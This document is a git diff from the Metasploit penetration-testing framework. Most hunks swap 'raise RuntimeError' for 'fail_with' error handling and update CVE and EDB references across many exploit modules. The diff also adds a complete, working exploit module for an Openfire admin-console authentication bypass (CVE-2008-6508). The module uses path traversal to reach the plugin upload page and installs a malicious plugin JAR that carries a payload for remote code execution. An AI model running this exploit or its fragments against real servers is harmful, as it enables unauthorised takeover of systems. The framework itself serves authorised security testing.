+ fail_with(Exploit::Failure::NoTarget, "Unable to automatically select a target")
end
print_status("Automatically selected target \"#{mytarget.name}\"")
else
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Find out which shell if we're using a Java target
if (mytarget.name =~ /Java/)
if not (plat = detect_platform())
- raise RuntimeError, 'Unable to detect platform!'
+ fail_with(Exploit::Failure::NoTarget, 'Unable to detect platform!')
end
case plat
@@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote
# UPLOAD
#
resource_uri = '/' + app_base + '.war'
- service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'] + resource_uri
+ service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
print_status("Starting up our web service on #{service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
@@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
}})
if (datastore['WARHOST'])
- service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'] + resource_uri
+ service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
end
print_status("Asking the JBoss server to deploy (via MainDeployer) #{service_url}")
@@ -235,14 +235,14 @@ class Metasploit3 < Msf::Exploit::Remote
})
end
if (! res)
- raise RuntimeError, "Unable to deploy WAR archive [No Response]"
+ fail_with(Exploit::Failure::Unknown, "Unable to deploy WAR archive [No Response]")
end
if (res.code < 200 or res.code >= 300)
case res.code
when 401
print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
end
- raise RuntimeError, "Upload to deploy WAR archive [#{res.code} #{res.message}]"
+ fail_with(Exploit::Failure::Unknown, "Upload to deploy WAR archive [#{res.code} #{res.message}]")
end
# wait for the data to be sent
@@ -252,7 +252,7 @@ class Metasploit3 < Msf::Exploit::Remote
select(nil, nil, nil, 1)
waited += 1
if (waited > 30)
- raise RuntimeError, 'Server did not request WAR archive -- Maybe it cant connect back to us?'
+ fail_with(Exploit::Failure::Unknown, 'Server did not request WAR archive -- Maybe it cant connect back to us?')
end
end
diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb
new file mode 100644
index 0000000000..57c4fd84b9
--- /dev/null
+++ b/modules/exploits/multi/http/openfire_auth_bypass.rb
@@ -0,0 +1,216 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'rex/zip'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ HttpFingerprint = { :pattern => [ /(Jetty)/ ] }
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Openfire Admin Console Authentication Bypass',
+ 'Description' => %q{
+ This module exploits an authentication bypass vulnerability in the administration
+ console of Openfire servers. By using this vulnerability it is possible to
+ upload/execute a malicious Openfire plugin on the server and execute arbitrary Java
+ code. This module has been tested against Openfire 3.6.0a.
+
+ It is possible to remove the uploaded plugin after execution, however this might turn
+ the server in some kind of unstable state, making re-exploitation difficult. You might
+ want to do this manually.
+ },
+ 'Author' =>
+ [
+ 'Andreas Kurtz', # Vulnerability discovery
+ 'h0ng10' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2008-6508' ],
+ [ 'OSVDB', '49663' ],
+ [ 'BID', '32189' ],
+ [ 'EDB', '7075' ],
+ [ 'URL', 'http://community.igniterealtime.org/thread/35874' ]
+ ],
+ 'DisclosureDate' => 'Nov 10 2008',
+ 'Privileged' => true,
+ 'Platform' => ['java', 'win', 'linux' ],
+ 'Stance' => Msf::Exploit::Stance::Aggressive,
+ 'Targets' =>
+ [
+ #
+ # Java version
+ #
+ [ 'Java Universal',
+ {
+ 'Arch' => ARCH_JAVA,
+ 'Platform' => 'java'
+ }
+ ],
+ #
+ # Platform specific targets
+ #
+ [ 'Windows x86 (Native Payload)',
+ {
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ }
+ ],
+ [ 'Linux x86 (Native Payload)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0,
+
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(9090),
+ OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
+ OptString.new('PLUGINNAME', [ false, 'Openfire plugin base name, (default: random)' ]),
+ OptString.new('PLUGINAUTHOR',[ false, 'Openfire plugin author, (default: random)' ]),
+ OptString.new('PLUGINDESC', [ false, 'Openfire plugin description, (default: random)' ]),
+ OptBool.new('REMOVE_PLUGIN', [ false, 'Try to remove the plugin after installation', false ]),
+ ], self.class)
+ end
+
+ def check
+ base = target_uri.path
+ base << '/' if base[-1, 1] != '/'
+
+ path = "#{base}login.jsp"
+ res = send_request_cgi(
+ {
+ 'uri' => path
+ })
+
+ if (not res) or (res.code != 200)
+ print_error("Unable to make a request to: #{path}")
+ return Exploit::CheckCode::Unknown
+ end
+
+ versioncheck = res.body =~ /Openfire, \D*: (\d)\.(\d).(\d)\s*<\/div>/
+
+ if versioncheck.nil? then
+ print_error("Unable to detect Openfire version")
+ return Exploit::CheckCode::Unknown
+ end
+
+ print_status("Detected version: #{$1}.#{$2}.#{$3}")
+ version = "#{$1}#{$2}#{$3}".to_i
+
+ return Exploit::CheckCode::Safe if version > 360
+
+ # Just to be sure, try to access the log page
+ path = "#{base}setup/setup-/../../log.jsp"
+ res = send_request_cgi(
+ {
+ 'uri' => path
+ })
+
+ if (not res) or (res.code != 200)
+ print_error("Failed: Error requesting #{path}")
+ return Exploit::CheckCode::Unknown
+ end
+
+ Exploit::CheckCode::Vulnerable
+ end
+
+ def get_plugin_jar(plugin_name)
+ files = [
+ [ "logo_large.gif" ],
+ [ "logo_small.gif" ],
+ [ "readme.html" ],
+ [ "changelog.html" ],
+ [ "lib", "plugin-metasploit.jar" ]
+ ]
+
+ jar = Rex::Zip::Jar.new
+ jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508"))
+
+ plugin_author = datastore['PLUGINAUTHOR'] || rand_text_alphanumeric(8+rand(8))
+ plugin_desc = datastore['PLUGINDESC'] || rand_text_alphanumeric(8+rand(8))
+
+ plugin_xml = File.open(File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508", "plugin.xml"), "rb") {|fd| fd.read() }
+ plugin_xml.gsub!(/PLUGINNAME/, plugin_name)
+ plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc)
+ plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author)
+
+ jar.add_file("plugin.xml", plugin_xml)
+
+ jar
+ end
+
+ def exploit
+ base = target_uri.path
+ base << '/' if base[-1, 1] != '/'
+
+ plugin_name = datastore['PLUGINNAME'] || rand_text_alphanumeric(8+rand(8))
+ plugin = get_plugin_jar(plugin_name)
+
+ arch = target.arch
+ plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]]
+
+ if (p = exploit_regenerate_payload(plat, arch)) == nil
+ print_error("Failed to regenerate payload")
+ return
+ end
+
+ plugin.add_file("lib/#{rand_text_alphanumeric(8)}.jar", payload.encoded_jar.pack)
+ plugin.build_manifest
+
+ # Upload the plugin to the server
+ print_status("Uploading plugin #{plugin_name} to the server")
+ boundary = rand_text_alphanumeric(6)
+
+ data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"uploadfile\"; "
+ data << "filename=\"#{plugin_name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n"
+ data << plugin.pack
+ data << "\r\n--#{boundary}--"
+
+ res = send_request_cgi({
+ 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin",
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>
+ {
+ 'Content-Type' => 'multipart/form-data; boundary=' + boundary,
+ 'Content-Length' => data.length,
+ 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
+ }
+ })
+
+
+ print_error("Warning: got no response from the upload, continuing...") if !res
+
+ # Delete the uploaded JAR file
+ if datastore['REMOVE_PLUGIN']
+ print_status("Deleting plugin #{plugin_name} from the server")
+ res = send_request_cgi({
+ 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}",
+ 'headers' =>
+ {
+ 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
+ }
+ })
+ if not res
+ print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.")
+ end
+ end
+ end
+end
diff --git a/modules/exploits/multi/http/sit_file_upload.rb b/modules/exploits/multi/http/sit_file_upload.rb
index 5a6090233e..b2ec6f6c97 100644
--- a/modules/exploits/multi/http/sit_file_upload.rb
+++ b/modules/exploits/multi/http/sit_file_upload.rb
@@ -110,10 +110,10 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Successfully retrieved cookie: #{session}")
return session
else
- raise RuntimeError, "Error retrieving cookie!"
+ fail_with(Exploit::Failure::Unknown, "Error retrieving cookie!")
end
else
- raise RuntimeError, "Error logging in."
+ fail_with(Exploit::Failure::Unknown, "Error logging in.")
end
end
@@ -162,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Successfully uploaded #{newpage}")
return res
else
- raise RuntimeError, "Error uploading #{newpage}"
+ fail_with(Exploit::Failure::Unknown, "Error uploading #{newpage}")
end
end
@@ -176,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Successfully retrieved upload dir: #{upload_dir}")
return upload_dir
else
- raise RuntimeError, "Error retrieving the upload dir"
+ fail_with(Exploit::Failure::Unknown, "Error retrieving the upload dir")
end
end
diff --git a/modules/exploits/multi/http/snortreport_exec.rb b/modules/exploits/multi/http/snortreport_exec.rb
index 7a71310016..ff3a9d5ec3 100644
--- a/modules/exploits/multi/http/snortreport_exec.rb
+++ b/modules/exploits/multi/http/snortreport_exec.rb
@@ -30,6 +30,10 @@ class Metasploit3 < Msf::Exploit::Remote
'Paul Rascagneres' #itrust consulting during hack.lu 2011
],
'Version' => '$Revision$',
+ 'References' =>
+ [
+ ['OSVDB', '67739']
+ ],
'Payload' =>
{
'Compat' =>
diff --git a/modules/exploits/multi/http/splunk_mappy_exec.rb b/modules/exploits/multi/http/splunk_mappy_exec.rb
index 5dd7457d98..a8a1d5bb00 100644
--- a/modules/exploits/multi/http/splunk_mappy_exec.rb
+++ b/modules/exploits/multi/http/splunk_mappy_exec.rb
@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
}
else
- raise RuntimeError, "Unable to get session cookies"
+ fail_with(Exploit::Failure::NotFound, "Unable to get session cookies")
end
res = send_request_cgi(
@@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 25)
if not res or res.code != 303
- raise RuntimeError, "Unable to authenticate"
+ fail_with(Exploit::Failure::NoAccess, "Unable to authenticate")
else
session_id_port = ''
session_id = ''
diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb
index 27e451eef1..964246c8c8 100644
--- a/modules/exploits/multi/http/struts_code_exec.rb
+++ b/modules/exploits/multi/http/struts_code_exec.rb
@@ -151,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote
when 'win'
windows_stager
else
- raise RuntimeError, 'Unsupported target platform!'
+ fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')
end
handler
diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
index cd732eb105..5a07039eb5 100644
--- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
+++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
@@ -202,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote
when 'java'
java_stager
else
- raise RuntimeError, 'Unsupported target platform!'
+ fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')
end
handler
diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
index ed3b505b82..0b5ccdebbf 100644
--- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
@@ -176,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (target.name =~ /Automatic/)
mytarget = auto_target
if (not mytarget)
- raise RuntimeError, "Unable to automatically select a target"
+ fail_with(Exploit::Failure::NoTarget, "Unable to automatically select a target")
end
print_status("Automatically selected target \"#{mytarget.name}\"")
else
@@ -212,14 +212,14 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => war,
}, 20)
if (! res)
- raise RuntimeError, "Upload failed on #{path_tmp} [No Response]"
+ fail_with(Exploit::Failure::Unknown, "Upload failed on #{path_tmp} [No Response]")
end
if (res.code < 200 or res.code >= 300)
case res.code
when 401
print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
end
- raise RuntimeError, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]"
+ fail_with(Exploit::Failure::Unknown, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]")
end
report_auth_info(
diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb
index 86f0077c91..b088f14520 100644
--- a/modules/exploits/multi/http/wikka_spam_exec.rb
+++ b/modules/exploits/multi/http/wikka_spam_exec.rb
@@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.headers['Set-Cookie']
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
else
- raise RuntimeError, "#{@peer} - No cookie found, will not continue"
+ fail_with(Exploit::Failure::Unknown, "#{@peer} - No cookie found, will not continue")
end
cookie
@@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote
login[name] = value
end
else
- raise RuntimeError, "#{@peer} - Unable to find the hidden fieldset required for login"
+ fail_with(Exploit::Failure::Unknown, "#{@peer} - Unable to find the hidden fieldset required for login")
end
# Add the rest of fields required for login
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote
cookie_cred = "#{cookie}; #{user}; #{pass}"
else
cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
- raise RuntimeError, "#{@peer} - Unable to login with \"#{cred}\""
+ fail_with(Exploit::Failure::Unknown, "#{@peer} - Unable to login with \"#{cred}\"")
end
return cookie_cred
@@ -172,7 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote
fields[n] = v
end
else
- raise RuntimeError, "#{@peer} - Cannot get necessary fields before posting a comment"
+ fail_with(Exploit::Failure::Unknown, "#{@peer} - Cannot get necessary fields before posting a comment")
end
# Generate enough URLs to trigger spam logging
diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb
index 64c37467cc..b927a91c92 100644
--- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb
+++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb
@@ -217,11 +217,11 @@ class Metasploit3 < Msf::Exploit::Remote
uri_path = datastore['URI'] || target['DefaultURI']
if(not cookie_name)
- raise RuntimeError, "The COOKIENAME option must be set"
+ fail_with(Exploit::Failure::Unknown, "The COOKIENAME option must be set")
end
if(not uri_path)
- raise RuntimeError, "The URI option must be set"
+ fail_with(Exploit::Failure::Unknown, "The URI option must be set")
end
res = send_request_cgi({
@@ -321,11 +321,11 @@ class Metasploit3 < Msf::Exploit::Remote
uri_path = datastore['URI'] || target['DefaultURI']
if(not cookie_name)
- raise RuntimeError, "The COOKIENAME option must be set"
+ fail_with(Exploit::Failure::Unknown, "The COOKIENAME option must be set")
end
if(not uri_path)
- raise RuntimeError, "The URI option must be set"
+ fail_with(Exploit::Failure::Unknown, "The URI option must be set")
end
# Generate and reuse the original buffer to save CPU
@@ -423,7 +423,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_line("*" * 40)
print_line('')
- raise RuntimeError, "Exploit settings are probably wrong"
+ fail_with(Exploit::Failure::Unknown, "Exploit settings are probably wrong")
end
else
print_status("No response from the server")
diff --git a/modules/exploits/multi/svn/svnserve_date.rb b/modules/exploits/multi/svn/svnserve_date.rb
index 285f492539..d8867a4121 100644
--- a/modules/exploits/multi/svn/svnserve_date.rb
+++ b/modules/exploits/multi/svn/svnserve_date.rb
@@ -114,12 +114,12 @@ class Metasploit3 < Msf::Exploit::Remote
if (sock.put(buf) || 0) == 0 and index < 3
print_error("Error transmitting buffer.")
- raise ExploitError, "Failed to transmit data" if !datastore['IgnoreErrors']
+ fail_with(Exploit::Failure::Unknown, "Failed to transmit data") if !datastore['IgnoreErrors']
end
if index == 3 and trash.length > 0
print_error("Received data when we shouldn't have")
- raise ExploitError, "Received data when it wasn't expected" if !datastore['IgnoreErrors']
+ fail_with(Exploit::Failure::Unknown, "Received data when it wasn't expected") if !datastore['IgnoreErrors']
end
}
diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb
index 38f5bafc5e..62ab1a5180 100644
--- a/modules/exploits/osx/browser/safari_file_policy.rb
+++ b/modules/exploits/osx/browser/safari_file_policy.rb
@@ -262,7 +262,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
def use_zlib
if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
- raise RuntimeError, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!"
+ fail_with(Exploit::Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")
end
end
diff --git a/modules/exploits/osx/browser/safari_metadata_archive.rb b/modules/exploits/osx/browser/safari_metadata_archive.rb
index 327556b811..84a61f4a94 100644
--- a/modules/exploits/osx/browser/safari_metadata_archive.rb
+++ b/modules/exploits/osx/browser/safari_metadata_archive.rb
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check_dependencies
@zip = (Rex::FileUtils::find_full_path('7za') || Rex::FileUtils::find_full_path('7za.exe'))
return if @zip
- raise RuntimeError, "This exploit requires the zip command to be installed in your path"
+ fail_with(Exploit::Failure::Unknown, "This exploit requires the zip command to be installed in your path")
end
def on_request_uri(cli, request)
diff --git a/modules/exploits/osx/mdns/upnp_location.rb b/modules/exploits/osx/mdns/upnp_location.rb
index c800a9921d..acdfb62d9d 100644
--- a/modules/exploits/osx/mdns/upnp_location.rb
+++ b/modules/exploits/osx/mdns/upnp_location.rb
@@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
socket = Rex::Socket.create_udp
- upnp_location = "http://" + datastore['LHOST'] + ":" + datastore['SRVPORT']
+ upnp_location = "http://" + datastore['LHOST'] + ":" + datastore['SRVPORT'].to_s
print_status("Listening for UPNP requests on: #{upnp_location}")
print_status("Sending UPNP Discovery replies...")
@@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote
upnp_port = scan_for_upnp_port()
if upnp_port == 0
- raise "Could not find listening UPNP UDP socket"
+ fail_with(Exploit::Failure::Unreachable, "Could not find listening UPNP UDP socket")
end
datastore['RPORT'] = upnp_port
diff --git a/modules/exploits/unix/http/freepbx_callmenum.rb b/modules/exploits/unix/http/freepbx_callmenum.rb
index 01cfaecdae..505e9a5d9e 100644
--- a/modules/exploits/unix/http/freepbx_callmenum.rb
+++ b/modules/exploits/unix/http/freepbx_callmenum.rb
@@ -32,6 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
+ [ 'CVE', '2005-2561' ],
[ 'EDB', '18649' ]
],
'Platform' => ['unix'],
diff --git a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb
index 9a6a883b95..750b6aa16c 100644
--- a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb
+++ b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2007-4560' ],
[ 'OSVDB', '36909' ],
[ 'BID', '25439' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/4761' ],
+ [ 'EDB', '4761' ]
],
'Privileged' => true,
'Payload' =>
diff --git a/modules/exploits/unix/smtp/exim4_string_format.rb b/modules/exploits/unix/smtp/exim4_string_format.rb
index 38d923e4a1..ae7a6f10f2 100644
--- a/modules/exploits/unix/smtp/exim4_string_format.rb
+++ b/modules/exploits/unix/smtp/exim4_string_format.rb
@@ -115,11 +115,11 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Server: #{self.banner.to_s.strip}")
if self.banner.to_s !~ /Exim /
disconnect
- raise RuntimeError, "The target server is not running Exim!"
+ fail_with(Exploit::Failure::NoTarget, "The target server is not running Exim!")
end
if not datastore['SkipVersionCheck'] and self.banner !~ /Exim 4\.6\d+/i
- raise RuntimeError, "Warning: This version of Exim is not exploitable"
+ fail_with(Exploit::Failure::Unknown, "Warning: This version of Exim is not exploitable")
end
ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
@@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
resp ||= 'no response'
msg = "MAIL: #{resp.strip}"
if not resp or resp[0,3] != '250'
- raise RuntimeError, msg
+ fail_with(Exploit::Failure::Unknown, msg)
else
print_status(msg)
end
@@ -167,7 +167,7 @@ class Metasploit3 < Msf::Exploit::Remote
resp ||= 'no response'
msg = "RCPT: #{resp.strip}"
if not resp or resp[0,3] != '250'
- raise RuntimeError, msg
+ fail_with(Exploit::Failure::Unknown, msg)
else
print_status(msg)
end
@@ -176,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
resp ||= 'no response'
msg = "DATA: #{resp.strip}"
if not resp or resp[0,3] != '354'
- raise RuntimeError, msg
+ fail_with(Exploit::Failure::Unknown, msg)
else
print_status(msg)
end
@@ -289,7 +289,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Check output for success
if second_result !~ /(MAIL|RCPT|sh: |sh-[0-9]+)/
print_error("Second result: #{second_result.inspect}")
- raise RuntimeError, 'Something went wrong, perhaps this host is patched?'
+ fail_with(Exploit::Failure::Unknown, 'Something went wrong, perhaps this host is patched?')
end
resp = ''
diff --git a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb
index 8ccfe2e8f0..d0fe3a3f62 100644
--- a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb
+++ b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb
@@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
cmd = payload.encoded
if not post(cmd, true)
- raise RuntimeError, "Unable to execute the desired command"
+ fail_with(Exploit::Failure::Unknown, "Unable to execute the desired command")
end
end
end
diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb
index 27c7f7bb7c..e24b4b224f 100644
--- a/modules/exploits/unix/webapp/coppermine_piceditor.rb
+++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb
@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (res and res.code == 200)
print_status("Successfully POST'd exploit data")
else
- raise RuntimeError, "Error POSTing exploit data"
+ fail_with(Exploit::Failure::Unknown, "Error POSTing exploit data")
end
handler
diff --git a/modules/exploits/unix/webapp/joomla_tinybrowser.rb b/modules/exploits/unix/webapp/joomla_tinybrowser.rb
index 68efafa3ec..15b04ee0ab 100644
--- a/modules/exploits/unix/webapp/joomla_tinybrowser.rb
+++ b/modules/exploits/unix/webapp/joomla_tinybrowser.rb
@@ -31,6 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
+ ['CVE', '2011-4908'],
['OSVDB', '64578'],
['EDB', 9296],
['URL', 'http://developer.joomla.org/security/news/301-20090722-core-file-upload.html'],
diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb
index 0bebff011c..7b4554ba48 100644
--- a/modules/exploits/unix/webapp/openx_banner_edit.rb
+++ b/modules/exploits/unix/webapp/openx_banner_edit.rb
@@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Need to login first :-/
cookie = openx_login(uri_base)
if (not cookie)
- raise RuntimeError, 'Unable to login!'
+ fail_with(Exploit::Failure::Unknown, 'Unable to login!')
end
print_status("Logged in successfully (cookie: #{cookie})")
@@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote
ids = openx_find_campaign(uri_base, cookie)
if (not ids)
# TODO: try to add an advertiser and/or campaign
- raise RuntimeError, 'The system has no advertisers or campaigns!'
+ fail_with(Exploit::Failure::Unknown, 'The system has no advertisers or campaigns!')
end
adv_id = ids[0]
camp_id = ids[1]
@@ -139,14 +139,14 @@ class Metasploit3 < Msf::Exploit::Remote
# Add the banner >:)
ban_id = openx_upload_banner(uri_base, cookie, adv_id, camp_id, content)
if (not ban_id)
- raise RuntimeError, 'Unable to upload the banner!'
+ fail_with(Exploit::Failure::Unknown, 'Unable to upload the banner!')
end
print_status("Successfully uploaded the banner image with id #{ban_id}")
# Find the filename
ban_fname = openx_find_banner_filename(uri_base, cookie, adv_id, camp_id, ban_id)
if (not ban_fname)
- raise RuntimeError, 'Unable to find the banner filename!'
+ fail_with(Exploit::Failure::Unknown, 'Unable to find the banner filename!')
end
print_status("Resolved banner id to name: #{ban_fname}")
diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb
index c66141b0af..52cd4fa554 100644
--- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb
+++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb
@@ -158,7 +158,7 @@ EOS
cmd ||= payload.encoded
if not go(cmd)
- raise RuntimeError, "Unable to execute the desired command"
+ fail_with(Exploit::Failure::Unknown, "Unable to execute the desired command")
end
handler
diff --git a/modules/exploits/unix/webapp/oscommerce_filemanager.rb b/modules/exploits/unix/webapp/oscommerce_filemanager.rb
index 1be874541e..6980a05d00 100644
--- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb
+++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'OSVDB', '60018' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/9556' ]
+ [ 'EDB', '9556' ]
],
'Privileged' => false,
'Platform' => ['php'],
diff --git a/modules/exploits/unix/webapp/php_vbulletin_template.rb b/modules/exploits/unix/webapp/php_vbulletin_template.rb
index 8d6e9af143..d8985d25e4 100644
--- a/modules/exploits/unix/webapp/php_vbulletin_template.rb
+++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb
@@ -87,9 +87,9 @@ class Metasploit3 < Msf::Exploit::Remote
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
- raise RuntimeError, 'Target PHP installation does not support chunked encoding. ' +
+ fail_with(Exploit::Failure::Unknown, 'Target PHP installation does not support chunked encoding. ' +
'Support for chunked encoded requests was added to PHP on 12/15/2005. ' +
- 'Try disabling HTTP::chunked and trying again.'
+ 'Try disabling HTTP::chunked and trying again.')
end
end
end
diff --git a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb
index 726ae05ffd..eab6532dff 100644
--- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb
+++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb
@@ -92,9 +92,9 @@ class Metasploit3 < Msf::Exploit::Remote
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
- raise RuntimeError, 'Target PHP installation does not support chunked encoding. ' +
+ fail_with(Exploit::Failure::BadConfig, 'Target PHP installation does not support chunked encoding. ' +
'Support for chunked encoded requests was added to PHP on 12/15/2005. ' +
- 'Try disabling HTTP::chunked and trying again.'
+ 'Try disabling HTTP::chunked and trying again.')
end
end
end
diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb
index e16c70627e..fc5bc113a5 100644
--- a/modules/exploits/unix/webapp/phpmyadmin_config.rb
+++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb
@@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2009-1151' ],
[ 'OSVDB', '53076' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/8921' ],
+ [ 'EDB', '8921' ],
[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php' ],
[ 'URL', 'http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/' ]
],
@@ -82,11 +82,11 @@ class Metasploit3 < Msf::Exploit::Remote
uri = datastore['URI'] + "scripts/setup.php"
response = send_request_raw({ 'uri' => uri})
if !response
- raise RuntimeError.new("Server did not respond to our initial request")
+ fail_with(Exploit::Failure::NotFound, "Failed to retrieve hash, server may not be vulnerable.")
return
end
if (response.body !~ /"token"\s*value="([^"]*)"/)
- raise RuntimeError.new("Couldn't find token and can't continue without it. Is URI set correctly?")
+ fail_with(Exploit::Failure::NotFound, "Couldn't find token and can't continue without it. Is URI set correctly?")
return
end
token = $1
